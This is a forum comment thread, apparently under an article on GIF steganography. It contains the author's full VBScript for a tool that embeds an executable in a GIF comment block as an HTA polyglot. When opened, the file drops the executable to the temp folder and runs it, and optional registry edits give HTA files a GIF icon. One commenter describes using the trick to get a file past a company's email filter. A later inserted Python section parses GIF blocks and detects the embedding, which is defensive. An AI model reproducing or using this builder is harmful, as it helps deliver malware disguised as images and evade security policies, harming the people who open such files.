While this is a very nice way of conducting covert message operations (lol), the image does not display in all applications. I've only tried a couple of apps (as a test), and it doesn't show up in the default Windows Picture and Fax Viewer.
Not saying that this is a great app, but I'm sure a lot of people (including myself) use it for quick double-click viewing.
~Brad / Disrupted
|
|
|
|
|
True ... but at least it's viewable in IE/Firefox.
I'll have to investigate why it fails for some apps ... most likely I've violated
the GIF file format comment block.
|
|
|
|
|
I know there is a very destructive use for this kind of thing, but I found a very good use. I read this article today, and put it in the back of my mind.
Anyway, a while later, I was asked to email a file to someone, I did, and it was bounced back. That company's security policy prevented my email attachment from being sent.
Embedding the zip file in a gif however, enabled the sending of this message.
I know this is not an ideal use for this sort of thing, but it is a cool way to send a file.
Thanks for this article.
|
|
|
|
|
Why not just rename the file?
|
|
|
|
|
Yes- just rename your .zip to .txt and send the file thru email.
I've done that many times.
|
|
|
|
|
Most mail servers scan the contents of the file, not just the file names, which was why I was unable to send the mail in the first place. However, the company where I was trying to send the email only accepts picture attachments. Simply renaming the file caused it to bounce back. There are other ways I could have sent the file, but like I said, this is cool, and it works.
|
|
|
|
|
I can't think of a good use for this technique [yet] but thanks for the information
Phil Harding
|
|
|
|
|
It was just a fun idea to embed data into images.
I'm not even really sure of a good use for it, if any.
Thanks.
|
|
|
|
|
Phil Harding wrote:
can't think of a good use for this technique
How about in regular delivered hta style apps - I personally love what one can do with an HTA with ease - but you always have the side effect of if you create something unique - you just gave all your work away
Something like this would at least throw them off track as to what the real source is, used in combination with a few other methods
|
|
|
|
|
I think anyone who actually saves and runs this is crazy. It seems to be a fundamental rule on virus avoidance never to run an executable from an unknown source.
I am not trying to slur the author, I am sure he is genuine, and wants to share the knowledge he has learnt along the way, but how can you know? When source is uploaded, those paranoid amongst us can always view the source to confirm the code's intention.
Being in a minority of one, doesn't make you insane George Orwell However, in my case it does
|
|
|
|
|
True. Even websites like this could contain malicious content, but in this case it doesn't. I think people should be made aware of suspicious coding techniques and let them decide how to use it or not. The zip file contains my vbscript, here's the source code: (see - there's nothing mysterious about it)
If there's sufficient negative comments, I can always remove the article. But, at least you're aware that seemingly harmless GIFs could contain malware.
' Title: Steganography: Hiding Data Within Data.
' Author: Vengy! (-_-)
' Tested: WinXP SP2 IE 6.0
' Email: cyber_flash@hotmail.com
' How it works:
' -------------
' Usage: cscript.exe hide.vbs your.gif your.exe
' This script merges "your.gif" and "your.exe" to create "your.gif.hta.gif",
' which correctly displays using the IE browser.
' If the 'Hide extension for known file types' option is enabled, which is the default setting,
' the "Save Picture As..." downloads it as "your.gif". (it's really "your.gif.hta")
' Important:
' ----------
' Not all GIFs will work!? Trial and error is the best method
' to find suitable images. Included are some working GIFs that
' will merge correctly with any EXE. The image "your.gif" must be a GIF89a type and *not* GIF87a.
' GIF87a Versus GIF89a:
' ---------------------
' There are technically two types of GIF file: GIF87a and the newer, improved GIF89a.
' Both are fully supported on most browsers, and both use .gif as their file name suffix.
' GIF87a is the original format for indexed color images.
' It uses LZW compression and has the option of being interlaced.
' GIF89a is the same, but also includes transparency and animation capabilities.
' If you want to add these features to your graphic, you'll need to create the graphic with a tool
' that supports the GIF89a format. These features have become so popular with web developers that
' this format has become the de facto standard on the Web today.
' +----------------------------------------------------------------------------+
' | Let the games begin! |
' +----------------------------------------------------------------------------+
Option Explicit
Dim data,p,i,f,file,ub,ts,pic_buf,pic,args,x
set args=WScript.Arguments
If args.Count<>2 Then
WScript.Echo "Please type the following: cscript.exe hide.vbs your.gif your.exe"
WScript.Quit
End If
pic=args(0)
file=args(1)
Dim o:Set o=CreateObject("Scripting.FileSystemObject")
Dim s:Set s=CreateObject("WScript.Shell")
'To change the HTA file icon to a GIF, uncomment these 2 lines:
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\","GIF Image","REG_SZ"
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\DefaultIcon\","%SystemRoot%\system32\shimgvw.dll,2","REG_SZ"
Set f=o.CreateTextFile(pic&".hta.gif",2)
WScript.Echo "Processing "&pic&" ..."
pic_buf=RSBinaryToString(ReadBinaryFile(pic))
' Remove end of gif hex tag 3B.
f.Write Left(pic_buf,len(pic_buf)-1)
' +----------------------------------------------------------------------------+
' | BEGIN: GIF comment block. |
' +----------------------------------------------------------------------------+
' Start new block tag.
f.Write chr(Int("&H21"))
' Comment tag.
f.Write chr(Int("&HFE"))
' Length of subblock. Seems to work!?
f.Write chr(Int("&HFF"))
' Start data vbscript
f.WriteLine ""
f.WriteLine "Set o=CreateObject("&chr(34)&"Scripting.FileSystemObject"&chr(34)&")"
f.WriteLine "Set s=CreateObject("&chr(34)&"WScript.Shell"&chr(34)&")"
f.WriteLine "p=o.GetSpecialFolder(2)&"&chr(34)&"\"&file&chr(34)
' Create data hex array.
f.Write "t=split("&chr(34)
WScript.Echo "Processing "&file&" ..."
data=AsciiToHex(RSBinaryToString(ReadBinaryFile(file)))
ub=UBound(data)
For i=0 To ub-1
f.Write data(i)&","
Next
f.Write data(ub)
f.WriteLine chr(34)&","&chr(34)&","&chr(34)&")"
f.WriteLine "Set f=o.CreateTextFile(p,2)"
f.WriteLine "For i=0 To UBound(t)"
f.WriteLine "f.Write chr(Int("&chr(34)&"&H"&chr(34)&"&t(i)))"
f.WriteLine "Next"
f.WriteLine "f.close"
' Run the data!
f.WriteLine "s.run(p)"
f.WriteLine "close()"
' End data vbscript.
f.WriteLine ""
' End of comment block.
f.Write chr(Int("&H00"))
' +----------------------------------------------------------------------------+
' | END: GIF comment block. |
' +----------------------------------------------------------------------------+
' Insert end of gif tag.
f.Write chr(Int("&H3B"))
f.Close
' +----------------------------------------------------------------------------+
' | Done. Your.gif.hta.gif has been created. |
' +----------------------------------------------------------------------------+
Set x=o.GetFile(pic&".hta.gif")
WScript.Echo "Created "&chr(34)&pic&".hta.gif"&chr(34)&" (bytes="&x.Size&")"
' +----------------------------------------------------------------------------+
' | Turns ASCII string sData into array of hex numerics. |
' +----------------------------------------------------------------------------+
Function AsciiToHex(sData)
Dim i, aTmp()
ReDim aTmp(Len(sData) - 1)
For i = 1 To Len(sData)
aTmp(i - 1) = Hex(Asc(Mid(sData, i)))
Next
ASCIItoHex = aTmp
End Function
' +----------------------------------------------------------------------------+
' | Converts binary data to a string (BSTR) using ADO recordset. |
' +----------------------------------------------------------------------------+
Function RSBinaryToString(xBinary)
Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)
If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS.Open
RS.AddNew
RS("mBinary").AppendChunk Binary
RS.Update
RSBinaryToString = RS("mBinary")
Else
RSBinaryToString = ""
End If
End Function
' +----------------------------------------------------------------------------+
' | Read Binary file |
' +----------------------------------------------------------------------------+
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream : Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
BinaryStream.Close
End Function
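Added example, not part of the original post or the author's script: a strict Python walk of the GIF block structure that collects comment extensions (0x21 0xFE) and reports malformed sub-block chains, which is what a single 0xFF length byte in front of longer data produces and a likely reason stricter viewers reject such files. It goes slightly beyond the thread by also flagging script-like text anywhere in the file; the function names, the marker list and the sample bytes are assumptions constructed for illustration.

```python
SCRIPT_MARKERS = (b"createobject", b"wscript.shell", b"<script", b"<hta:application")

def read_sub_blocks(buf, pos):
    """Follow a chain of length-prefixed sub-blocks; return (payload, next_pos)."""
    out = bytearray()
    while True:
        size, pos = buf[pos], pos + 1      # IndexError here means the chain ran off the file
        if size == 0:                      # 0x00 terminates the chain
            return bytes(out), pos
        if pos + size > len(buf):
            raise ValueError(f"sub-block at offset {pos - 1} is truncated")
        out += buf[pos:pos + size]
        pos += size

def table_len(packed):                     # byte length of a colour table, 0 if absent
    return 3 << ((packed & 7) + 1) if packed & 0x80 else 0

def scan_gif(buf):
    """Return (comments, findings) for a GIF held in bytes."""
    comments, findings = [], []
    if buf[:6] not in (b"GIF87a", b"GIF89a") or len(buf) < 13:
        return comments, ["not a GIF"]
    pos = 13 + table_len(buf[10])          # header + screen descriptor + global table
    try:
        while buf[pos] != 0x3B:            # 0x3B is the trailer
            tag = buf[pos]
            if tag == 0x21:                # extension: label byte, then sub-blocks
                label = buf[pos + 1]
                payload, pos = read_sub_blocks(buf, pos + 2)
                if label == 0xFE:          # comment extension
                    comments.append(payload)
            elif tag == 0x2C:              # image descriptor, local table, LZW data
                pos += 10 + table_len(buf[pos + 9]) + 1
                _, pos = read_sub_blocks(buf, pos)
            else:
                raise ValueError(f"unknown block tag 0x{tag:02X} at offset {pos}")
        if pos + 1 != len(buf):
            findings.append("data after trailer")
    except (ValueError, IndexError) as exc:
        findings.append(f"malformed: {exc}")
    findings += [f"script-like text: {m.decode()}" for m in SCRIPT_MARKERS if m in buf.lower()]
    return comments, findings

# Constructed samples: a 1x1 GIF, the same with a valid comment, and one laid out
# the way the script above writes its comment block (one 0xFF length byte, long text).
BASE = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00" b"\x00\x00\x00\xff\xff\xff"
        b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00" b"\x02\x02\x4c\x01\x00")
CLEAN = BASE + b"\x21\xfe\x05hello\x00" + b"\x3b"
TEXT = b'Set o=CreateObject("Scripting.FileSystemObject")\r\n' + b"A" * 300
ODD = BASE + b"\x21\xfe\xff" + TEXT + b"\x00\x3b"
```

A lenient renderer that stops decoding once the image data is drawn never reaches the bad chain, which fits the thread's observation that browsers display the file while other viewers do not.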
|
|
|
|
|
Mark Focas wrote:
It seems to be a fundamental rule on virus avoidance never to run an executable from an unknown source.
um, you don't know where you are? You don't know what the author said this was?
Or you do not download anything from the internet, any example projects from here that contain EXEs or make EXEs, no shareware, no freeware, and do you actually know Bill? He might be trying to steal windows back you know.
My god - if this is actually a real live exploit - don't you think there would be nine thousand posts telling you so? And I would think that the author would be smarter than to say - hey look at my thingy here that could be an exploit - download it, and I will own you - or hell, could be really trying to mess with ya and already has won.
Jeez - what's the worst thing that can happen? Have not met an exploit yet that has pulled a 357 out on me, nor even one that has figured out a way to hold me hostage until I visit their search engine - in fact - never met one that was still hanging around after 18 hours of cussing, and finally a reformat - and never really have met one that I probably didn't deserve to get based on my own actions of going around to places that are likely to play that game.
|
|
|
|
|
Your comment would be appreciated by more people if you treated it as an IT professional. My comment was one of the first to be posted. As good as CodeProject is, it is not invulnerable to people who wish to post malicious code.
In answer to your question, no, I do not run executables from this site. If the full source is not included, I do not run it. And no, I do not use freeware or shareware. I use open source (very many, mostly from sourceforge). The very few free non source included executables I use, are from reputable sites that I already know of thru the general programmer community.
I guess, from the vitriol of your post, that you are quite young, and don't have the experience that older members of this community have, so when you mention that 18 hours of cussing and a reformat will cure any problem, well, I have never had to reformat because of a virus. Those 18 hours I would rather spend playing with my kids, reading them books, or making love with my wife.
Good luck, I imagine you will get to be quite an expert on reformatting drives.
|
|
|
|
|
What can possibly be the use for this other than for a virus?
|
|
|
|
|
Yes, this can be used in many different ways from secret communication, trojans, viruses or whatever you can think of.
I just think it's cool to be able to embed data into a host program and still maintain the original.
Thanks.
|
|
|
|
|
Let's just remember to use our powers for good, not for evil.
|
|
|
|
|
Please can you explain the application or use of this process?
I tried your sample and Norton would not let it run until I gave it full permission.
Best regards,
Paul.
Jesus Christ is LOVE! Please tell somebody.
|
|
|
|
|
The ability to save a .hta from the IE browser probably caused an issue for Norton. Overall, the main point is the ability to embed data into a GIF image as a comment block without altering the main image in any way. Comments are ignored when rendering the images.
Thanks.